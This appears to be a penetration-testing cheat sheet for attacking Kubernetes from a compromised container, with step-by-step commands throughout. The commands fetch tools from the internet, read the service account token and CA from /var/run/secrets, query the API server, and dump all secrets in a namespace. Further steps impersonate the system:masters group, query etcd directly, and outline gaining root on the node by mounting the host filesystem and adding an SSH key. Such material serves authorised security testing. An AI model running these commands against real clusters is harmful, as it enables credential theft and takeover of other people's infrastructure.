Skip to content

Compromised Container

Access to Container

NCC Attack Chain / Pentest process

In addition to this page, review: Deep Dive into Real-World Kubernetes Threats

Install custom tools (and prove Internet access)
  • curl -sLO https://storage.googleapis.com/kubernetes-release/release/v1.8.4/bin/linux/amd64/kubectl
  • chmod +x kubectl
  • mv kubectl /bin
Obtain the default ServiceAccount token
  • ls /var/run/secrets/kubernetes.io/serviceaccount/
    ca.pem namespace token
  • TOKEN=$(cat /var/run/secrets/kubernetes.io/serviceaccount/token)
  • CACERT=/var/run/secrets/kubernetes.io/serviceaccount/ca.crt
  • NAMESPACE=$(cat /var/run/secrets/kubernetes.io/serviceaccount/namespace)
Find API server IP and interact with curl
  • env | grep KUBE
  • K8S=https://$K8S_HOST:$K8S_PORT/api/v1/namespaces/
  • curl -H "Authorization: Bearer $TOKEN" --cacert $CACERT $K8S/healthz
Interact with kubectl
  • kubectl --token=<TOKEN> get nodes --all-namespaces
Obtain all secrets
  • Obtain Service Account Token
    • $ read TOKEN < <(kubectl -n default describe secrets $(kubectl -n default get secrets | awk '/SANAME/ {print $1}') | awk '/token:/ {print $2}')
  • Obtain master IP
    • $ kubectl cluster-info
      Kubernetes master is running at MASTER-IP:8443
  • Check that TOKEN can list secrets in default namespace
    • $ curl -k -v -H "Authorization: Bearer <jwt_token>" -H "Content-Type: application/json" https://<master_ip>:6443/api/v1/namespaces/default/secrets | jq -r '.items[].data'
Impersonate privileged account
  • kubectl get secrets --as=null --as-group=system:masters

Dashboard/APIs

Direct Dashboard Access curl -s http://kubernetes-dashboard.kube-system
Direct APIs Access
  • kubectl get --raw=/api | jq .serverAddressByClientCIDRs[0].serverAddress -r
    192.168.64.11:6443
  • curl -s http://192.168.64.11:6443
Access the Kubelet API (kubelet-exploit) See Kubelet Exploit

Network

Port Scan See Network page
Access Other Services Inside the Cluster Directly redis-cli -h redis-master.default

ETCD

Direct ETCD Access (and obtain root on underlying node)
  1. Obtain Kubelet or higher SA Token
  2. Schedule a Pod & mount the host filesystem
  3. Add SSH Key
  4. SSH Into Node
$ curl -s http://<kuberenets-IP>:2379/v2/keys/?recursive=true
Direct ETCD Access (review the content)
  1. Obtain a copy of etcdctl
  2. Query the API
  3. Review/dump the content
$ curl -sLO https://github.com/coreos/etcd/releases/download/v3.1.5/etcd-v3.1.5-linux-amd64.tar.gz
# Query the API - v2 (K8s <= 1.5)
#    And explore the config
#    /registry/secrets/default may contain the default service token
$ etcdctl --endpoint=http://[etcd_server_ip]:2379 ls

# Query the API - v3
#   Dump an instance of the etcd database to a file on disk
#   Read the file with: https://github.com/br0xen/boltbrowser
$ export ETCDCTL_API=3 
$ etcdctl snapshot